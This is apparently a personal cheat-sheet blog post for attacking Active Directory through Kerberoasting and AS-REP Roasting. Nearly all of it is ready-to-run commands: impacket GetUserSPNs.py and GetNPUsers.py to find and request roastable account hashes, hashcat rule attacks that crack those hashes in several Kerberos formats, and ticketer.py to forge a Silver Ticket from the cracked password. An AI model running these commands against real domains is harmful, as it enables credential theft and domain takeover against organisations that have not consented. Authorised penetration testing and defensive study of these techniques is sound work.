These are some scribbles if I ever need to look up how to exploit Kerberoasting or AS-REP Roasting. I might expand on this later…​

Note
 This is nothing new, most of this stuff can be easily found on the Internet. This is just for my own reference. Please excuse my brevity.

Environment

For this article, we’re assuming the following (YMMV):

user $ echo $SHELL
/usr/bin/fish

user $ which GetUserSPNs.py
/usr/bin/GetUserSPNs.py
user $ which GetNPUsers.py
/usr/bin/GetNPUsers.py

user $ set win_domain company.org
user $ set dc_ip 192.168.1.1
user $ set regular_ad_user gijsbert

Enum

Using GetUserSPNs.py from impacket to check for Kerberoastable accounts:

user $ GetUserSPNs.py {$win_domain}/{$regular_ad_user}

Retrieve Kerberoastable encrypted hashes:

user $ GetUserSPNs.py {$win_domain}/{$regular_ad_user} -request -outputfile \
         hashes.spnroast

Using GetNPUsers.py (also from impacket) to check for AS-REP Roastable accounts:

user $ GetNPUsers.py {$win_domain}/{$regular_ad_user}

Retrieve AS-REP Roastable encrypted hashes:

user $ GetNPUsers.py {$win_domain}/{$regular_ad_user} -request -format \
         hashcat -outputfile hashes.asreproast

Cracking

Cracking "$krb5tgs$23$" type hashes (RC4), using a hashcat rule based attack (Kerberoasting):

user $ hashcat -O -m 13100 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.spnroast cracked-dict-history \
         --potfile-path hashcat.pot -r d3adhob0.rule

Cracking "$krb5tgs$17$" type hashes (AES-128), using a hashcat rule based attack (Kerberoasting):

user $ hashcat -O -m 19600 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.spnroast cracked-dict-history \
         --potfile-path hashcat.pot -r OneRuleToRuleThemStill.rule

Cracking "$krb5tgs$18$" type hashes (AES-256), using a hashcat rule based attack (Kerberoasting):

user $ hashcat -O -m 19700 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.spnroast cracked-dict-history \
         --potfile-path hashcat.pot -r OneRuleToRuleThemStill.rule

Cracking "$krb5asrep$23$" type hashes, using a hashcat rule based attack (AS-REP Roasting):

user $ hashcat -O -m 18200 -w 3 -a 0 --session=rule -o cracked.out \
         --outfile-format=3 hashes.asreproast cracked-dict-history \
         --potfile-path hashcat.pot -r OneRuleToRuleThemStill.rule

Analysis

Show accounts of which the hashes are cracked:

user $ cut -d \$ -f 1-5 hashcat.pot

Printing Tickets

Print a Kerberos Silver Ticket, using the cracked hash (WIP):

user $ ticketer.py -password 'xxxxxxxx' -domain-sid \
         'S-1-5-21-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx' -domain $win_domain \
         -dc-ip $dc-ip -spn '<spn>' <vuln_account>